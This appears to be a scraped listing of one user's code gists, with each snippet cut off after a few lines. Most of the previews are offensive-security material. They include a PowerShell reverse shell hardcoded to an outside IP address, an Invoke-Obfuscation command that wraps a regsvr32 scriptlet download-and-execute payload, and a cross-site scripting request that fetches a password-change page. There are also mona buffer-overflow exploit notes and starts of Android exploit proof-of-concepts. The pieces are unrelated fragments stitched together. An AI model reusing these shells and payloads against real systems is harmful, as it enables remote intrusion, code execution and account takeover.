This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
"@ | |
Add-Type -TypeDefinition @" | |
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
public static class GetAddress | |
{ | |
[DllImport("kernel32", SetLastError=true, CharSet = CharSet.Ansi)] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1. Macro Web_Delivery + Invoke-Obfuscation | |
Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {WEBDELIVERY_PAYLOAD} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' | |
e.g | |
import-module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {regsvr32 /s /n /u /i:http://IP:8080/37yWWx.sct scrobj.dll} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var x = new XMLHttpRequest(); | |
var r=0; | |
x.open('GET','https:/XXXXXXX/AgirhNet/StaticWebForm/Outils/ChangePwd.aspx'); | |
x.responseType = "document"; | |
x.send(null); | |
x.onreadystatechange = function() { | |
if (x.readyState === 4 && r != 1) { | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
alert(1) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$socket = new-object System.Net.Sockets.TcpClient('37.187.112.19', 443); | |
if($socket -eq $null){exit 1} | |
$stream = $socket.GetStream(); | |
$writer = new-object System.IO.StreamWriter($stream); | |
$buffer = new-object System.Byte[] 1024; | |
$encoding = new-object System.Text.AsciiEncoding; | |
do | |
{ | |
$writer.Flush(); | |
$read = $null; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
--- | |
version: '3.7' | |
services: | |
nginx: | |
build: | |
context: ./ | |
dockerfile: Dockerfile.nginx | |
image: defectdojo/defectdojo-nginx:${NGINX_VERSION:-latest} | |
depends_on: | |
- uwsgi |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Mona tricks: | |
--------------- | |
!mona pc 1000 -> Launch exploit with pattern | |
!mona findmsp -> autocalculate offset, ESP size..... | |
No jmp esp in Exec Region (.text) but no DEP: | |
!mona asm -s "jmp esp" | |
!mona find -s "\xff\xe4" -m <module> | |
----------------- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<a href="william://www.hackplayers.com">MEOW</a> | |
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package com.adon.exploitcors; | |
import androidx.appcompat.app.AppCompatActivity; | |
import android.content.Intent; | |
import android.os.Bundle; | |
import android.widget.Toast; | |
public class MainActivity extends AppCompatActivity { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package com.example.intentpoc; | |
import android.os.Bundle; | |
import androidx.appcompat.app.AppCompatActivity; | |
import android.content.Intent; | |
public class MainActivity extends AppCompatActivity { |
NewerOlder